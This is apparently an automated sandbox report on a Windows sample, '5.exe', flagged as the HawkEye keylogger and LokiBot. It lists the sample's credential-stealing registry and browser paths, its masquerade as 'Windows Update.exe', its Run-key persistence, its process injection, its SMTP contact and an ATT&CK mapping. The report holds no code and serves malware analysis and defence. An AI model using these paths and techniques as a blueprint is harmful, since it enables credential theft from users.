          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exe Code function: 2_2_0040208D cpuid, 2_2_0040208D
          Source: C:\Users\user\Desktop\5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\5.exe Code function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 2_2_00401B74
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 15_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 15_2_0040724C
          Source: C:\Users\user\Desktop\5.exe Code function: 1_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 1_2_0040594D
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
          Source: Windows Update.exe, 0000000A.00000002.383634625.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.343433664.00000000007D4000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.343320969.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.351731371.00000000007D4000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.351665012.0000000000768000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

          Stealing of Sensitive Information:

          Yara detected MailPassView
          Yara detected HawkEye Keylogger
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Tries to steal Mail credentials (via file registry)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 15_2_00402D9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 15_2_00402D9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: ESMTPPassword 15_2_004033D7
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Yara detected WebBrowserPassView password recovery tool
          Source: Yara matchFile source: 2.0.5.exe.41ce65.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.53.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41ce65.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.26.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a07e2d.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a97e0d.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.331916237.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1928, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1060, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5844, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 6244, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6736, type: MEMORYSTR
          Tries to steal Instant Messenger accounts or passwords
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

          Remote Access Functionality:

          Yara detected HawkEye Keylogger
          Detected HawkEye Rat
          Source: 5.exe, String found in binary or memory: HawkEyeKeylogger
          Source: 5.exe, String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
          Source: 5.exe, String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
          Source: 5.exe, String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, String found in binary or memory: HawkEyeKeylogger
          Source: Windows Update.exe, String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
          Source: Windows Update.exe, String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
          Source: Windows Update.exe, String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
          Source: C:\Users\user\Desktop\5.exe, Code function: 2_2_024E0B5E listen, 2_2_024E0B5E
          Source: C:\Users\user\Desktop\5.exe, Code function: 2_2_024E0F6E bind, 2_2_024E0F6E
          Source: C:\Users\user\Desktop\5.exe, Code function: 2_2_024E0B20 listen, 2_2_024E0B20
          Source: C:\Users\user\Desktop\5.exe, Code function: 2_2_024E0F3B bind, 2_2_024E0F3B
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Code function: 10_2_04BD0F6E bind, 10_2_04BD0F6E
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Code function: 10_2_04BD0B5E listen, 10_2_04BD0B5E
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Code function: 10_2_04BD0F3B bind, 10_2_04BD0F3B
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Code function: 10_2_04BD0B20 listen, 10_2_04BD0B20

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
          | Replication Through Removable Media 1 | Windows Management Instrumentation 21 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 111 | OS Credential Dumping 1 | System Time Discovery 1 | Replication Through Removable Media 1 | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Web Service 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
          | Default Accounts | Native API 21 | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 21 | Peripheral Device Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Process Injection 412 | Obfuscated Files or Information 31 | Credentials in Registry 2 | Account Discovery 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Encrypted Channel 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Software Packing 11 | Credentials In Files 1 | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture 21 | Scheduled Transfer | Non-Standard Port 1 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 1 | LSA Secrets | System Information Discovery 29 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Remote Access Software 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Query Registry 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Non-Application Layer Protocol 3 | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 41 | DCSync | Security Software Discovery 181 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Application Layer Protocol 13 | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Virtualization/Sandbox Evasion 41 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 412 | /etc/passwd and /etc/shadow | Process Discovery 4 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
          | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Hidden Files and Directories 1 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
          | Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop |
          | Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | System Network Configuration Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery |

          Behavior Graph

          Behavior Graph ID: 535767, Sample: 5.exe, Startdate: 07/12/2021, Architecture: WINDOWS, Score: 100

          Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 12 other signatures
          Sample-level DNS/IP: 127.0.0.1 (unknown)

          • 5.exe (started)
            - Dropped: C:\Users\user\AppData\Local\...\rgsbzeog.dll, PE32
            - Signature: Injects a PE file into a foreign processes
          • 5.exe (started by 5.exe)
            - Dropped: C:\Users\user\AppData\...\Windows Update.exe, PE32
            - Dropped: C:\...\Windows Update.exe:Zone.Identifier, ASCII
            - Dropped: C:\Users\user\AppData\Local\...\5.exe.log, ASCII
          • Windows Update.exe (started by 5.exe)
            - Dropped: C:\Users\user\AppData\Local\...\rgsbzeog.dll, PE32
            - Signature: Injects a PE file into a foreign processes
          • Windows Update.exe (started by Windows Update.exe)
            - DNS/IP: whatismyipaddress.com, 104.16.155.36, 49751, 80, CLOUDFLARENETUS, United States
            - DNS/IP: smtp.privateemail.com, 66.29.159.53, 49765, 587, ADVANTAGECOMUS, United States
            - DNS/IP: 192.168.2.1 (unknown)
            - Dropped: C:\Users\user\AppData\...\WindowsUpdate.exe, PE32
            - Dropped: C:\...\WindowsUpdate.exe:Zone.Identifier, ASCII
            - Signatures: Changes the view of files in windows explorer (hidden files and folders); Deletes itself after installation; Writes to foreign memory regions; 4 other signatures
          • vbc.exe (started by Windows Update.exe)
            - Signatures: Tries to steal Mail credentials (via file registry); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
          • vbc.exe (started by Windows Update.exe)
            - Signature: Tries to harvest and steal browser information (history, passwords, etc)
          • dw20.exe (started by Windows Update.exe)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label |
          | --- | --- | --- | --- |
          | 5.exe | 41% | Virustotal | |
          | 5.exe | 31% | ReversingLabs | Win32.Trojan.LokiBot |
          | 5.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          | Source | Detection | Scanner | Label |
          | --- | --- | --- | --- |
          | C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Joe Sandbox ML | |
          | C:\Users\user\AppData\Roaming\Windows Update.exe | 100% | Joe Sandbox ML | |
          | C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dll | 33% | ReversingLabs | Win32.Trojan.LokiBot |
          | C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll | 33% | ReversingLabs | Win32.Trojan.LokiBot |
          | C:\Users\user\AppData\Roaming\Windows Update.exe | 31% | ReversingLabs | Win32.Trojan.LokiBot |
          | C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 31% | ReversingLabs | Win32.Trojan.LokiBot |

          Unpacked PE Files


          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
whatismyipaddress.com | 104.16.155.36 | true | false | | high
smtp.privateemail.com | 66.29.159.53 | true | false | | high

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://whatismyipaddress.com/ | false | | high

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation

                                                                                            Contacted IPs


                                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.16.155.36 | whatismyipaddress.com | United States | 13335 | CLOUDFLARENETUS | false
66.29.159.53 | smtp.privateemail.com | United States | 19538 | ADVANTAGECOMUS | false

                                                                                            Private

                                                                                            IP
                                                                                            192.168.2.1
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                            Analysis ID:535767
                                                                                            Start date:07.12.2021
                                                                                            Start time:18:16:19
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 14m 54s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:5.exe
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:32
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@19/18@2/4
                                                                                            EGA Information:Failed
                                                                                            HDC Information:
                                                                                            • Successful, ratio: 56.9% (good quality ratio 50.7%)
                                                                                            • Quality average: 72.8%
                                                                                            • Quality standard deviation: 34%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 88%
                                                                                            • Number of executed functions: 344
                                                                                            • Number of non-executed functions: 243
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Found application associated with file extension: .exe
                                                                                            Warnings:
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.22, 40.112.88.60, 20.54.110.249
                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                            • Not all processes were analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            Time      Type             Description
                                                                                            18:17:51  API Interceptor  27x Sleep call for process: Windows Update.exe modified
                                                                                            18:17:57  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                            18:18:01  API Interceptor  1x Sleep call for process: dw20.exe modified
                                                                                            18:18:06  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                            18:18:35  API Interceptor  1x Sleep call for process: WerFault.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            No context

                                                                                            Domains

